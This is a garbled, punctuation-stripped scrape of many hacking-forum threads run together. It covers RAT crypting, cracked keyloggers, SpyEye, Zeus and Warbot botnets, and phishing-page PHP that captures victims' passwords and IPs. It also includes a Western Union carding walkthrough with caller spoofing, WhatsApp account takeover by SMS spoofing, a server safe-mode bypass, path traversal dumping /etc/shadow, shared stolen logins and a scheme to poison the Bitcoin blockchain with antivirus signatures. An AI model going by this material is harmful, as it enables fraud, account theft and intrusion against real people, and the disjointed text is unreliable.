geekmango wrote making darkcomet rat fud working this post demonstrates how make darkcomet rat undetectable. 
url please watch and subscribe. 
these are the names tools needed for work source code generator. 
cracked snd darkcomet version. 
microsoft visual studio thanks broo it's useful. 
okay you used this for logging into the website and have not deleted cache etc. 
you can use program get all emails and passwords from browser. 
need for huge hacks that the case. 
you wish can provide you with more info. 
sent from nexus using tapatalk. 
how did you thanks. 
goode jobs bro very good. 
thank you very much for sharing. 
hello guyes here going post method which you can earn bitcoin without mining just click the link and complete the registration and start earning register. 
you can earn more bitcoin then click multiply bitcoin can set thepayout multiplier press ctrl shift and past the given code the console and not close the tab continuously increase the bit coins for best work use crome browser var minvalue maxloss aimedprofit maxops endresult ops bet function. 
get double your btc ake multiplier jackpot function. 
html martingale function maxloss maxloss newvalue minvalue newvalue end result endresult endresult console. 
log martingale finished ops operations console. 
log result endresult martingale minvalue. 
chalo dekhte hasi kesi. 
blind sql injection sql injection. 
hope see that asap. 
user premiumlogin pass premium login. 
com don't change the password the account not working. 
thanks you brother thanks. 
dracula keylogger full version cracked one the best keyloggers out there. 
this the full version cracked not the shitty free version. 
seriously hit that button that's motivating factor hidden content you must reply see links spent time cracking this for you guys please rate positive you enjoy don't think necessary for virus scan but for who skeptical here hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
user david baldwin pass premium login. 
maybe like inviato dal mio asus tapatalk. 
thanks for the feedback. 
the link dead anyone wants reuploaded just let know. 
need know this thing. 
the thread old but you want still help. 
sdfswf wfwerfwfw wfwfw fwefwefwefw efwfwefwe fwefw wef. 
have you ever gotten tired logging into openvpn here's how you can auto log you don't have openvpn download here. 
and the other tool will using resource hacker which can downloaded here locate the openvpn folder which normally found here program files openvpn then copy the openvpn gui your desktop. 
and drag the new openvpn into resource hacker. 
will look like this open dialog will now look like this. 
change where says username here your vpn user name and password here your vpn password. 
now click file save now when you start openvpn will open with your username and password already entered. 
hope could help lot people because found this method and wanted share with community. 
love read feedback and you need any help with anything shoot i'm all the time. 
just case your wondering this tutorial was tested nvpn. 
send sms and call pranks any number. 
how use select prank sms call and enter the mobile number send. 
send multiple just choose another prank and enter the number. 
you want something more elaborated try call centers for. 
real person will touch with the number you provide download. 
hey thanks very much been after working copy. 
user superlogin pass premium login. 
api files fabffm blob download support future developing this tool filling form submit your number. 
guys now posting new bsnl hack trick whick given friend and uses this trick since months. 
its new trick working flawless all over india. 
direct trick not based bbm pack. 
small data pack required. 
unlimited download speed capping. 
maintain balance use this trick. 
modem proof note step step images given rar file can config easily download config file from here. 
let see wish nice. 
merci cela peux etre utile parfois. 
thanks bro where can buy good cpanel. 
moskilz wrote looking forward implementing these methods. 
thanks lets give this. 
how can get the script sir. 
hello here little tut because often see questions regarding this. 
step open your picture gimp and save. 
ico step bind your. 
exe with the picture your choice and use the icon from step. 
step open the chartable font lucida sans unicode search for the char click choose copy. 
step rename your file the. 
exe step now insert the char from step between filename and pgj. 
step say thanks and enjoy tut raz. 
want see this now. 
looking for help from hacker possible. 
looking top get into site and export some basic data from into its property website you can help with this leave message thanks. 
start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp. 
thank very muchthank very much. 
found this thread another hidden network onion net. 
read trough before you make any judgement. 
has absolutely nothing with earning money scamming people whatever. 
it's about bitcoin security flaw and you cannot make any money out any way. 
the flaw easy verify without bitcoin client. 
also note that the links here considered spam does not promote anyone. 
the links are the following domains virustotal. 
com nllabs something some antivirus company. 
the link flat text document with some binary codes. 
banners there anything and that's. 
pastebin for some binary codes too large post here. 
i'm posting this with another account than original since i'm bit paranoid. 
i'm just wondering what you think that's the topic. 
here the bitcoin database distributed non centralized and exists each and every one the hosts running bitcoin client. 
there's copy the database all bitcoin client that's how the works. 
once transaction committed can't undone. 
bitcoin transmission stored event the database. 
you can inject arbitrary raw byte binary string into the database files forever because that setting the target address transaction wanted value more less. 
bitcoin address the intended receiver any amount coins consists bytes. 
the first one equals default and uninteresting. 
the following bytes identifies the intended receiver and can set exactly anything. 
the following bytes just hash the former bytes. 
bitcoin transaktion contains such address and stored each and every bitcoin client forever. 
you delete the database from one bitcoin client has fresh install your client will synchronize with the rest the network. 
now imagine that inject called virus signatures that anti virus programs recognizes into the bitcoin database. 
what'll happen that that will trigger the anti virus program for every bitcoin client user that has anti virus program installed and this won't away ever. 
you can't clean the database. 
those virus signatures are harmless their own but they are something that anti virus program use recognize viruses. 
the anti virus programs will think that the local bitcoin database infected. 
spamming the bitcoin database with virus signatures will cause havoc. 
some antivirus programs will delete the database locally others will deny their bitcoin client access the databases. 
some won't able start their bitcoin clients again and can't understand why. 
some will format and reinstall their computer. 
once again get infected when they get bitcoin client again. 
panic will spread among computer. 
uneducated rumors will spread that bitcoin spreading viruses. 
havoc will simply emerge. 
media will react and dramatize the thing enormously. 
the value bitcoins will drop hasty. 
all this just because send minimal amount bitcoins the smallest amount allowed given bitcoin addresses. 
you can confirm that the injection works doing the following. 
org converter click hex the top and check further down. 
place exactly bit hex value there. 
now you can either send any amount the bitcoin address that appears the lower box and verify that your local bitcoin database soon contains the bytes string your choise. 
but you can also take that address and input into the search box the upper right. 
info and see that this recipent your bytes indeed addressed exactly you specified it's called the hash and just trust that it'll stored exactly the physical disk well. 
now how know what bytes send make long story short i've converted all virus signatures that could find from open project. 
strings into byte long strings and later into bitcoin addresses all signatures equal longer than strings has been used. 
the short ones have just been padded with zeros. 
put all those viruses into one file causes virus total nuts. 
imagine having that forever the bitcoin database files. 
this far from being the best you can with injecting stuff into the bitcoin database there are for example better virus signatures and alike out there that can used. 
but this should work pretty well and cause lot havoc and annoyance. 
org converter above you can easily convert the bitcoin addresses hex and see that those comes solely from the virus definition database. 
when the coins are sent those addresses they are lost forever since nobody owns those addresses. 
please help spamming the bitcoin database with virus signatures. 
pick some address random check that haven't been corrupted use brainwallet and virus signature list and send minimal amount coins that address. 
i've failed miserably this point since lack bitcoins. 
thought i'd have enough now i've long fought get some btc but aparently wasn't enough you need minimum amount fractions bitcoin able send anything. 
the addresses are available here. 
com whuk there's point altering those for your own winning sake. 
even you get thousands those minimal required transaktion amounts. 
they'll combined have value less than the price biscuit. 
you have contact atention always post your contact. 
looking for bank phishing partner. 
this good tutorial from you like keep thanks. 
atention always post your contacts. 
any one had verified mail contatowork. 
nice can you give this mailer bro. 
you're using the target's computer then you can look for saved passwords. 
wow what good post bro. 
thank you for this great share. 
size large the name god the merciful tutoriel show you how dns poisoning works. 
rar thanks xsecurity for uploading youtube. 
thanks man good tools. 
his tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
thank you and enjoy reading. 
this first topic here and hope you enjoy image smile. 
png spy eye new http botnet spyeye was written this moment exe has size. 
bot invisible processes invisible files invisible autorun registry. 
works ring mode like bot zeus. 
first download spyeye this link hide reply. 
ziv hide reply step image. 
jpg step upload main. 
zip formgrab acces panel. 
jpg exctract the files. 
user pass qwerty user pass don't change the password the account not working. 
ciao grazie from italy. 
anybody any review something. 
sruthy wrote tutorial hack anyone facebook email. 
now just what say and leave that tab open now login your facebook and copy the username the person username you want hack like this. 
url basically the name after the url the username. 
the link shows url like then you cannot use this method them. 
thank you very much. 
full version software free download with serial key crack about use platinum hide keep your real address hidden surf anonymously secure all the protocols your provide full encryption your activity while working internet and much more. 
get platinum online privacy protection. 
with platinum hide you can surf anonymously send anonymous emails through any web based mail system access blocked websites forums get protected from any website that wants monitor your reading interests and spy upon you through your unique address etc. 
your identity secure protected and anonymized. 
what's more platinum hide allows you select your location such united states united kingdom france etc. 
from the choose country window. 
platinum hide works with internet explorer firefox opera maxthon myie and compatible with all types routers firewalls home networks wireless networks and any other kind internet. 
why hide when connecting the internet the computer network router assigned public address. 
you visit websites that address transmitted and recorded log files kept those servers. 
access logs leave behind trail your internet activity. 
quite necessary hide your real address you not want traced others. 
how hide with one button click platinum hide enables you keep your real address hidden surf anonymously secure all the protocols your provide full encryption your activity while working internet and much more. 
get unbanned from forums and blocked websites change your address and then you can get yourself unbanned from any forums other blocked websites that have ever banned you. 
operating systems windows vista bit and bit. 
brother will love share this with you. 
how this with protocol. 
sure its not gonna work but lets try and check out. 
need someone who can remove search listings google yahoo bing someone slandering and talking shit their own wiki page and need clean asap. 
cant get any jobs because they use full name their webpage fuckers. 
let check this out. 
interesting all kind making money need people idea. 
there are commercial and cracked software that are way better. 
analysis i'm not using. 
looking forward hack using metasploti. 
just sign here hide. 
khpba hide and confirm your account receive usd. 
thanks for sharing bro dnice toolsi want. 
how can get this. 
preferably with debian board many needed system inquirements ram brute illegal content jabb jabbim. 
would like read this please. 
thank you for the share you have linux port. 
warbot vers construtor cracked warbot http based bot that allows you make large sums money selling installations and upgrades. 
what differentiates from most other warbot robots their desktop ajax powered single report task. 
reports tasks allow their customers view the progress their facilities real time updates. 
apart from these amazing features the bot itself has the following features extremely stable ddos tcp udp with throttle control automatic and manual bot size small only kilobytes coded pure and assembler for speed and reliability dependencies other than the standard windows dlls bypass uac works windows and windows vista bot extremely stable full error tolerant installation process take the control panel has the following features desktop fully featured and easy use too save icon positions complete windows live stats view your botnet army updates every seconds requires little bandwidth this means you not need pay for host you not want coded well oop php. 
the source very well written you'll like. 
thanks looking forwrd using. 
garda imdi hemen inceliyorum can yedi iminin seni. 
has been done need worry about anymore. 
google fake free fake pages. 
luckmangamer wrote nice software and also includes guide for how use. 
scroll see the hypertext download links. 
thanks for this agree. 
would love have one this free netflix accounts screens pls. 
how true can dis hope aint scam. 
steam accounts for free. 
thank you very much worked and didnt know anuthing awsome thank you very much worked and didnt know anuthing awsome really asd asd. 
will like see what loks like. 
want share with you webr shell. 
will bypass most the litespeed server. 
painting and download links are below. 
the menus are english some content turkish. 
url url url url url url url url url url url url url url url i'm glad you commented use. 
developed shell suit your comment. 
com send bitcoin minutes accept paypal. 
bitcoin anonymous shop bitcoin. 
vyrus wrote all mail password cracker. 
gmail hotmail yahoo yandex successfully finds passwords for mail and many more. 
rar password vipunderground download url. 
found this tool free version. 
here its cracked version program security removed. 
update check opening removed. 
vip members functions unlocked. 
need any username and password. 
com rar qlrpy fuke. 
need mpore people like you who post such stuff. 
spoof links sounds useful spoof links sounds useful. 
hmm let see this working. 
didnt understand that what the need this this website. 
sorry didnt got not website its need. 
just download the file. 
open that folder and there text file open follow instruction download hide. 
com aziz zhi file. 
does this thing really work really hope does since i'm looking get bloody account back. 
want try cause broke today. 
not sure the link still works. 
amazing tools thnk you very much. 
mast bhot acha nae bhai log. 
where's the link how can download. 
worked with earlier versions couldn't find the new one until now. 
looks great thank you. 
painkiller wrote email account checker reiluke works yahoo gmail hotmail download here url virus scan report url. 
bro thanks for the insight. 
but have little problem. 
after had changed the. 
pbtml and clicked replay could not find the link. 
please how find the link the upload. 
this hack works tricking the whatsapp verification servers sending spoofed request for authorisation code intended for alternative phone. 
install whatsapp your device whatsapp now starts counter where sends verification message its servers. 
block the messeage service can blocked changing the message center number pushing the phone into airplane mode. 
whatsapp now offers alternative method verification choose verify through sms and fill your email address. 
once you click send the sms click cancel terminate the call for authorisation the whatsapp server. 
now you have sms spoofing you can using this app for android click download from the link posted the first comment. 
check your outbox and copy the message details into the spoofer application and send the spoofed verification. 
use this app and send sms from country code victims mobile number message your email address. 
you will now receive messages intended for the spoofed number your mobile device and you can communicate with people under the spoofed number and you have successfully hacked their whatsapp account plz express experience. 
features gui the main window had change dirty buttons removed from the bottom and are now display tabs the title bar gui other options such generate server downloader settings etc. 
are the button menu the title bar then gain space for the sin static notifier gui the eula disclamer had changed read carefully contain also lot informations the last paragraphs about how use darkcomet. 
func the download file system had totally change still multithreaded that means you can download many files from many computers the same time but during the file download the current user file manager can't used then the transfer will faster and course far more stable. 
func more limitation data sending now for example you can kill process the same time download files. 
func the upload file system had totally change like for the download see beyound gui toast gui had change bit gui file manager gui had totally change now more userfriendly pro and less bloated shit gui inspired software. 
func add usefull shortcuts the top both files list file manager func download folder added with recusive option fast and stable func search manager had been recoded and now more use friendly fast stable and functionnal and the big advantage now fully multithreaded server and client you can cancel search cancel the listing after the reception the result etc. 
also fully linked the file manager act the search files easily. 
gui some icons changed try uniformise all icons step step del control center logs removed because useless since few versions del control center plugins manager removed because useless since many versions todo make better one func remote shell bug fix for some countries now correctly show accents etc. 
func remote shell multithreading been recoded entirely now fully stable fix the users list ram now correctly displayed used. 
func remote desktop now the picture compression directly done gdi api's more fast stable and consume less memory fix remote desktop been optimized threading speed and stability fix resizing image algorythm been optimized func quality bar added desktop settings func remote control for desktop capture been improved fix webcam speed and memory usage better now multithreading been optimized aswell func now you can change the quality the picture webcam capture download hide. 
sounds good lets have look. 
luckmangamer wrote attach config attach info commview for wifi powerful wireless network monitor and analyzer for. 
loaded with many user friendly features commview for wifi combines performance and flexibility with ease use unmatched the industry. 
commview for wifi captures every packet the air display important information such the list access points and stations per node and per channel statistics signal strength list packets and network connections protocol distribution charts etc. 
providing this information commview for wifi can help you view and examine packets pinpoint network problems and troubleshoot software and hardware. 
commview for wifi includes voip module for depth analysis recording and playback sip and. 
packets can decrypted utilizing user defined wep wpa psk keys and are decoded down the lowest layer. 
with over supported protocols this network analyzer allows you see every detail captured packet using convenient tree like structure display protocol layers and packet headers. 
additionally the product provides open interface for plugging custom decoding modules. 
wep and wpa key retrieval add ons are available subject terms and conditions. 
number case studies describe real world applications commview for wifi business government and education sectors. 
commview for wifi comprehensive and affordable tool for wireless lan administrators security professionals network programmers anyone who wants have full picture the wlan traffic. 
this application runs under windows vista and requires compatible wireless network adapter. 
supported adapters what you can with commview for wifi scan the air for wifi stations and access points. 
specify wep wpa keys decrypt encrypted packets. 
view detailed per node and per channel statistics. 
view detailed connections statistics addresses ports sessions etc. 
configure alarms that can notify you about important events such suspicious packets high bandwidth utilization unknown addresses rogue access points etc. 
view protocol pie charts. 
browse captured and decoded packets real time. 
search for strings hex data captured packet contents. 
log individual all packets files. 
load and view capture files offline. 
import and export packets sniffer etherpeek airopeek observer netmon tcpdump hex and text formats. 
export any address smartwhois for quick easy lookup. 
capture data from multiple channels simultaneously using several usb adapters. 
capture mpdu and msdu packets. 
and much more who needs commview for wifi wlan administrators. 
home users who are interested monitoring their wlan traffic. 
programmers developing software for wireless networks system requirements minimum the application will run requirements for the being used. 
recommended mhz processor ram disk space for program files extra disk space may required captured packets are logged the disk. 
depending the traffic volume and usage mode the requirements may hight operating systems and bit windows windows server windows vista windows server windows. 
there are two types stealers. 
php stealers before starting you need clear your cookies private data for firefox internet explorer msn etc etc. 
for protecting your self. 
after clearing your private data now need sniffer. 
good you have private one but also you can use free trial versions. 
you dont have then download from here. 
php event download event commview event goto files. 
zip after installing sniffer run start monitoring your network adapter. 
after starting will monitor all the incoming outgoing traffic. 
now goto your stealer's server run kaspersky click allow now everytime ask. 
stealer read your private data which already wiped before starting this and then send over internet kaspersky shows like this. 
allow just time then goto your sniffer check the ports where ftp shown the last access ftp shown here. 
now the list double click one the outgoing traffic whose destination port 'ftp'. 
now the window appears front you your desired target. 
now open ftp client enter his info username pass fuck his logs. 
the same method apply php stealer but cant see its logs have look. 
enjoy cracking stealers have fun. 
woow lets try this shitt. 
let try hope there ghost link dead please upload. 
fuck all that imma watch. 
you knoe someone who can this will pay for him. 
nice hope they are not expired. 
after lot researching came upon with whatsapp hacks which really works and this article will also clear some misconception whatsapp hacking. 
whatsapp sniffer tool for root terminals read whatsapp conversations wifi network open wep wpa wpa. 
captures the conversations pictures videos and coordinates that aresent received android phone iphone nokia the same wifi network. 
has not been tested with indows phone terminals. 
can read the messages written received the blackberry they use their own servers and not whatsapp. 
this application designed demonstrate that the security whatsapp communications null. 
just use the tcpdump program which reads all the wifi network packets and filters those which has origin destination whatsapp servers. 
all messages are plain text does not decrypt anything complying fully with the legal terms whatsapp. 
while not disallow the use sniffers such ethereal tcpdump general any going efforts disallow reverse engineer our system our protocols explore outside the boundaries the ordinary requests made clients whatsapp. 
for wpa wpa encrypted networks uses the tool arpspoof optional. 
requirements rooted android device. 
your victim should use same through which you are connected. 
this trick much similar hack your friend facebook account. 
decrypting conversations have your victim locked his whatsapp you want all his conversation your. 
generally for security reasons whatsapp encrypt conversation while taking backup card phone memory. 
but have found tool xda that claims decrypt all the whatsapp conversation down your. 
you have some access over his device you can also send files from bluetooth your device and later read all the conversations. 
this tool called whatsapp xtract and for this all credits goes ztedd some general advice how backup whatsapp and get the database file android whatsapp settings more backup chats copy the folder whatsapp the card your backup location. 
ideally also use the app titanium backup backup the full whatsapp application together with its data copy the backup from the folder titaniumbackup the card your backup location. 
use this tool whatsapp backup extractor download this thread show the chats friendly readable format. 
you will find inside the titanium backup archive com. 
whatsapp date some digits. 
alternatively without titanium backup you can use the msgstore. 
crypt file from the folder whatsapp databases the card. 
iphone use itunes create unencrypted backup use iphone backup tool get the file net. 
twin iphone backup extractor. 
make sure create unencrypted backup with itunes these tools can handle encrypted backups. 
another possibility are forensic tools like ufed physical analyzer. 
blackberry sync your blackberry with desktop manager and then copy the messagestore. 
file from however seems that this file encrypted currently don know how get the unencrypted messagestore. 
file blackberry not supported yet nokia not known yet nokia not supported yet for further detail about this method you can move this forum xda. 
using spywares using party spywares can very useful for spying not only whatsapp conversation but also many things like you can able track gps location you can capture the lock screen passwords and they can also used for monitoring websites. 
there are many spywares the market but recommend bosspy. 
because free some misconceptions about whatsapp hacking after writing whatsapp tricks and hacks android have received number mail most them were asking for help for hacking their partner whatsapp and have replied them all. 
but lots people were having misconceptions about whatsapp hacking let discuss over here. 
hacking whatsapp much harder than hacking facebook and twitter facebook and twitter can hacked using social engeenering techniques like phising and many others when compare hack someones whatsapp account and gain full access over his account nearly impossible. 
there tool that can hack whatsapp and give you full access over someone whatsapp account. 
yes there are lot youtube video websites filled with whatsapp hack tool which claim that they can but the reality they can. 
this article for educational purposes only. 
are not responsible for actions any individual. 
replying see this thanks. 
let see what this tut about. 
com cgi bin auction auction. 
cgi action gallery cat cata host. 
unix server mysql error based resp. 
time avg current user hsb localhost sql version. 
log current hsb system user hsb localhost host name. 
com installation dir usr user 'hsb db' 'localhost' data bases information schema hsb test. 
thanks for the post superb bro. 
get unbanned from forums and blocked websites. 
encipher wrote well seeing there are many ways this don't think this will original. 
edit adfly link broken. 
will try this one. 
help needed needsomeone code paypal amazon apple website login which after take them page where ask them give their first name last name dob full address name the card card number exp ccv account number sort code mmn after that takes them the legit website please anyone can help with touch etown jabber. 
nice one look for this long time. 
thank you much bro. 
checking out right now thanks. 
good stuff acess internet. 
push free accounts left. 
very serious buyer and need percent real hacker work with. 
zeus exploits needed ceo business emails needed and few more things. 
great tools letme check. 
thanks man nice post. 
how about the outcome result can anyone prove this. 
wanna see how this work. 
cybdom wrote this modified version the famous botnet zeus. 
you can download from here for free great. 
okay thanks lot will check. 
send your skype username pls. 
need this script bad now. 
homepal your pal home video entertainment hidden content you must reply see links dnworld homepage foradejogo. 
net ponte barca campos divis honra viana castelo hidden content you must reply see links hidden content you must reply see links hidden content you must reply see links home hidden content you must reply see links. 
thanks for the nice tool. 
sirius wrote you can simply click the select button and choose the free itunes code value you want. 
normal that most you would prefer the free itunes codes but offer only free itunes codes daily meaning that not all you will have the chance get free itunes code. 
this because dont want our generator abuse and shut down. 
itunes gift code already used you can just select for itunes code wait for the next day your code will uploaded our server where you can download and use. 
thanks pro for this share. 
thanks bond for condivision. 
root jzn tax kghhv. 
you can download clean version from here. 
net qkvxmcw note you need compile the source code using codeblocks. 
lets check and see how cool this works. 
thank you for this software and tutorial. 
very much appreciated this bro. 
thank you brother love man. 
here quick tutorial showing how hack steam accounts with program called quickbreak bruteforcer. 
virusscans virustotal free online virus malware and url scanner. 
org scanresult dbdbba url out scanners reported malware second attachment code. 
com file scan report. 
fbab out scanners reported malware. 
blazelord wrote very easy method btc more working june you can instantly cash out and very easy earn this not gambling anything like enjoy that srry plz grup chod and akele. 
painkiller wrote features connects through proxy account won't get disabled tutorial built into the program. 
open harecash downloader step. 
enter the link the white bar step. 
wait for the download button appare then press download. 
you have slow inter net may take minute more size plz thank for leeching size size enjoy size virus scan multi engine antivirus scanner services novirusthanks. 
wlxf upload download link hours. 
want try will report. 
lets hope still works. 
ebook made for the method earn upto per month like. 
the process totally automated for ptc site you dont have click any ads the bot will for you. 
com zyd downoad ebook url. 
need the passwords apple. 
without notice from the owners password reset option. 
checking out for some fun. 
thanks for the post man. 
thanks you sharing info. 
injector botnet function http grabber firefox chrome download execute udp flood ddos chat massagebox download hide. 
nice tutorial want dota mmr thanks. 
thanks great work man. 
error bro can you change your acc. 
send your messenger add yahoo duzoma yahoo. 
com wrzid wqe bootybooter. 
zip rghost file sharing bootybooter. 
analysis note i'm not updating this anymore. 
this isn't that strong but it'll make slower networks lag crash. 
thank you for bro thanks. 
wow love this shell. 
thanks for posting this bro. 
manxem wrote good need try this good. 
good prices for big orders. 
how boost utorrent speed from kbps kbps utorrent very popular tool for download anything the web. 
but you have unsatisfied your download speed and want tweak follow the step below first. 
com and then download the utorrent client. 
org and download the cheat engine. 
znjd after that open your utorrent. 
then open the cheat engine and click the leftmost icon namely select process open choose utorrent click attach debugger process and answer yes. 
now the cheat engine tick the enable speedhack. 
then you can enter the value. 
the text box right after the speed. 
can maximize your download speed times but needs take least one minute update the down speed result the utorrent. 
can maximize your download speed times and needs take least seconds update. 
not only the down speed also includes the other data likes speed etc. 
note you type the cheatengine your utorrent download speed remains unchanged. 
will maximize your download speed times. 
will reduce your download speed times. 
finally enjoy download link code. 
nice job brother that's fucking sick. 
web server microsoft iis. 
net server msaccess resp. 
time avg drive drive error maybe it's rom drive error maybe it's rom. 
that same with more. 
hack the servers paypal and vps only this link. 
ixdwy want answers pls thanks. 
med bad boy wrote thanks bro always welcome bro. 
want check this out. 
everyone i'm noob hacking didn't much and want learn much possible i'm trying all bunch things myself and with friend who just started learning with everything and have question about clients and servers. 
let's say have netcat listener which listen code lvp and want get reverse tcp every client that connects using simply code. 
won't ask it's possible believe anything possible i'll ask what need get thanks. 
great article thanks alot. 
need the link again. 
its very good and need lot. 
rafiqctg wrote hope they work thanks today here with bumper collection. 
plz post download link. 
com pass john yahoo. 
com pass beb intelliggent nxt. 
pass don't change the password the account not working. 
thank you for sharing this. 
damn thanks are you professional carder need help can you. 
your always broke like and you need cash right away the first thing you have have valid cc's. 
you will need because you need the actual western union transfer and another get the tools nessisary the transfer. 
you are going need the following tools before you westernunion. 
com and transfer money. 
complete background check the card holder this because you are going try and transfer anything over dollars usd they will ask you various questions such your previous address social security number date birth mothers maiden name what your middle name what bank issued you your credit card etc. 
order get that kind infomation you will need site like peoplefinders. 
com and costs about for the infomation you might need for western union. 
phone spoofer voice changer you will need this because western union will think you are fraudster you arent calling from the card holders phone number you must use phone spoofer service make the caller western union come with the card holders phone number. 
basically trick western union into thinking your calling from the card holders house. 
the voice changer comes with the phone spoofer service and you need this obviously your own voice isnt being recorded incase investication and also your male and your using females get money from you will want change your voice sound like female. 
call fowarding service this something you will need because the phone spoofing service blocks numbers any toll free phone number. 
you can only dial digit numbers with phone spoofers you have get call fowarding service when you call the digit number from the call forwarding service will foward western union. 
internet phone service you are located europe this must because will cost you too much use the spoofer and call fowarding service and also not traceable. 
personally use pre paid cell phone but i'm located the usa. 
after you have got that stuff all set the first thing you need make sure the call fowarding works and the spoofer works and comes with whatever number you put for the caller. 
when you finally have that all set and you have your background check all set then you westernunion. 
com and make the transfer. 
after you make the transfer will most likely say something the affect transfer hold please call western union confirm something that effect and you call them with the caller spoofer and call fowarding service. 
b's this may have some problems and might not able pull this off the first times but you will get the hang like did. 
have done about transfers and only had maybe actually though for pickup. 
another thing you should get fake because that will the only way link back the fraudster investication. 
you have fake and use pickup money you will most likely not get caught will very hard track you down. 
remember that you may not successful your first few times but keep trying and when you get successful transfer you will really happy. 
some things would like point out that first check and make sure the card your going use valid personally use yahoo wallet verify the before even think using. 
also get spoofing service for caller voice changer use spoofcard. 
com and for the call fowarding service use accessline. 
com please rep and thanks you like this post questions are welcome dance dance dance dance dance dance dance dance dance dance dance dance. 
this will fun lets see works. 
thanks but dear that not hacking tool. 
qrab wrote new priv mailer inbox. 
message decode base bit bit binary quoted printable. 
subject decode utf subject. 
select sender name select sender email select subject. 
ssl url this very good. 
ikyuiy yuj rtyjtyjt tyj tyjjtjy. 
this brute forcing program for the and coming indy game minecraft minecraft. 
use the leecher find address thread the official minecraft forums. 
php and put the text box. 
tnvery useful infromation for beginners dash. 
advanced search search engines enables analysis provided exploit get post capturing emails urls with internal custom validation junction for each target url found. 
lib permission code php version. 
php curl lib php cli lib curl support enabled curl information. 
allow url fopen permission reading writing user root privilege the sudoers group operating system linux proxy random tor permission execution chmod inurlbr. 
php installing lib curl sudo apt get install php curl installing lib cli sudo apt get install php cli installing proxy tor. 
resume apt get install curl libcurl libcurl dev php php cli php curl. 
com googleinurl scanner inurlbr. 
let see this stuff. 
hello guys this sundar have tried penetrate website and could able download some files like etc passwd etc shadow etc usr etc host etc contab etc group etc issue etc local motd php. 
ini var shells and much more files notepad files. 
downloaded everything through path traversal attack technique now don't know how use this details effectively get the admin access. 
there any way get admin access there any files usefull that can download get the admin username and password there any way use the files effectively upload webpage remotely i'm very much confused and upset. 
have spent weeks find out and asked many people but couldn't exploit that website. 
note its just for education purpose asking its possible hack that site will inform the site owner that will fix soon but without knowing how exploit couldn't contact that person and tell what the problem exactly. 
the quick brown fox jumped over the lazy doge. 
has anyone tested and can prove works. 
hope really works and hasnt been patched. 
how does this work cant see the link yet but sounds interesting. 
thanks going give try. 
anyone else have any luck. 
thank you for shared. 
hope the content good lets try this out. 
how about doing this really need better explanation. 
thanks for the nice share. 
thanks for posting this hop works. 
dogpen wrote vpn literately vpn vpn. 
thanks for the tools. 
hope gonna useful for. 
salam bypass safe mode litespeed server just creat htaccess and put this code code. 
php forcetype application it's old but still effective. 
this tutorial aimed beginner phishers who know how make basic phisher learn bit php make more little more complex phishers. 
this only the beginning you can expand much more than this. 
but that for different tutorial. 
all one liners here. 
first there are variables. 
variables are changing numbers and text page without directly changing the page. 
change the variable you change the url show what the variable and request the variable the page. 
let's say your phisher page download. 
rar this telling the page replace any name variables with hello. 
make variable just add this code. 
rar page source hello you are downloading. 
this would produce hello you are downloading hello. 
you have multiple variables your url you would add the command then the other variable. 
rar size page source hello you are downloading. 
this file and has been downloaded times. 
make your phishers easier use for others you may want add admin panel your phisher. 
here admin login page source code enter your password below. 
php method get password which will produce all this will send the password entered passchecker. 
php log get 'log' log pass handle fopen pass file fclose handle header 'location. 
exit elseif log pass header 'location. 
exit else header 'location fail. 
php exit require config. 
php this just pulls information from config. 
php which the only file your users have edit. 
this contains your password and your text file information. 
log get 'log' gets the log variable entered password. 
log pass handle fopen pass file fclose handle header 'location. 
exit the variable log matches the variable pass your config. 
php file will redirect you pass file which also configured yoyr config. 
english you put the right password your passwords file will open. 
else header 'location fail. 
php exit the variables log and pass not match brings you fail. 
fail can whatever you want here's mine. 
php code you fail life wrong password. 
your i'm not sure you are still submitting the users well. 
this all ran off your initial config. 
php which pretty self explanatory. 
define 'pass file' 'passes. 
txt' your passwords file can anything ending. 
pass password your password for admin panel function getip tracking down the victim's getenv getenv else getenv getenv else getenv remote addr getenv remote addr else unknown return that's for the admin panel. 
php file very basic. 
com handle fopen passes. 
txt foreach get variable value fwrite handle variable fwrite handle fwrite handle value fwrite handle fwrite handle fclose handle exit header location. 
com this where the victim redirected after they login. 
download site you can usually put the download link right there premium cookies are usually already set the file download will start premium user. 
txt this opens your password file which passes. 
txt can whatever you want long ends. 
txt you will fine. 
html works well foreach get variable value fwrite handle variable fwrite handle fwrite handle value fwrite handle fwrite handle writes all your variables into the text file. 
you only want certain variables posted not all you can use sprintf entrys. 
php file using sprintf code. 
php gets variables from config. 
fileid post 'fileid' gets variables from previous page. 
filename post 'filename' serverid post 'serverid' size post 'size' accountid post 'accountid' password post 'password' get 'vl' get 'dl' setcookie accountid accountid sets cookie for the accountid date date sends the date the password file hostname gethostbyaddr server 'remote addr' getip gets the victim's address used with above line. 
show errors shows errors with commands with die command. 
sprintf sends variables text. 
sprintf link filename submitted variables. 
sprintf username accountid entry. 
sprintf password password entry. 
sprintf date date handle fopen pass file pass file found config. 
php which was told open the top the script. 
handle die can't perform operation show errors enabled the die command showing errors. 
fwrite handle entry die can't perform operation fclose handle header 'location. 
com cgi bin premium. 
password redirects them not only through their premium zone but the file well. 
the login invalid will show that the redirection. 
exit that's for admin panels and variables will add more stuff later. 
may add cookies well it's kind hard explain though and not very basic. 
click search home show off all forums community upgrade vip account search search forum help help documents money make money more more links offensive community xvyctim offensive community hacks exploits and various discussions proxies and socks again super proxies new fresh announcements some other awesome news share new reply thread rating thread modes again super proxies new fresh montana offline junior member posts threads joined aug reputation money donate this post was last modified codefire. 
oviezane offline junior member posts threads joined nov reputation money donate pls need working for network here's network name 'mtn nigeria access ponit web. 
port etisalat access point etisalat. 
airtel nigeria apn wap. 
will grateful for your help enter keywords search thread new reply quick reply message type your reply this message here. 
signature disable smilies close search. 
